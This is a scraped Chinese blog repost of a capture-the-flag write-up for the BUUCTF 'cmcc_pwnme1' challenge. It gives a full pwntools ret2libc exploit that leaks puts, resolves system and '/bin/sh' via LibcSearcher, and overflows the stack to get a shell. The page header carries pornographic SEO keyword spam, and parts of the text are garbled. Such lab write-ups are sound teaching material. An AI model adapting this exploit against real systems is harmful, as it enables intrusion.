日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 编程资源 > 编程问答 >内容正文

编程问答

[BUUCTF-pwn]——cmcc_pwnme1

發(fā)布時(shí)間:2024/4/17 编程问答 24 豆豆
生活随笔 收集整理的這篇文章主要介紹了 [BUUCTF-pwn]——cmcc_pwnme1 小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

[BUUCTF-pwn]——cmcc_pwnme1

  • 題目地址:https://buuoj.cn/challenges#cmcc_pwnme1

先checksec一下,什么保護(hù)都沒(méi)有開(kāi),嘶

在IDA中


看完之后,相信大家和我一樣.就這???
思路很清晰, 選擇5,進(jìn)入getfruit,利用棧溢出.修改返回地址為 getflag
結(jié)果, 沒(méi)有這個(gè)文件, 搞笑呀

不過(guò)可以棧溢出, 我們可以利用ret2libc來(lái)解決

思路

通過(guò)棧溢出,循環(huán)調(diào)用.
第一次利用棧溢出leek出地址, 找到libc計(jì)算偏移找到system和binsh
第二次利用棧溢出進(jìn)行執(zhí)行

exploi

from pwn import * from LibcSearcher import * p = remote('node3.buuoj.cn',27311) elf = ELF('./pwnme1') #context.log_level = 'debug' puts_plt = elf.plt['puts'] puts_got = elf.got['puts'] main = elf.symbols['main'] p.sendline('5')payload = 'a' * 0xa4 + 'aaaa' + p32(puts_plt) + p32(main) + p32(puts_got) p.sendlineafter('Please input the name of fruit:',payload) puts_addr = u32(p.recvuntil('\xf7')[-4:]) log.success("puts_addr ---->>" + hex(puts_addr))libc = LibcSearcher('puts', puts_addr) libc_base = puts_addr - libc.dump('puts') sys = libc_base + libc.dump('system')binsh = libc_base + libc.dump('str_bin_sh') p.sendline('5') payload = 'a' *0xa8 + p32(sys) + 'junk' + p32(binsh) p.sendlineafter('Please input the name of fruit:',payload) p.interactive()

總結(jié)

以上是生活随笔為你收集整理的[BUUCTF-pwn]——cmcc_pwnme1的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。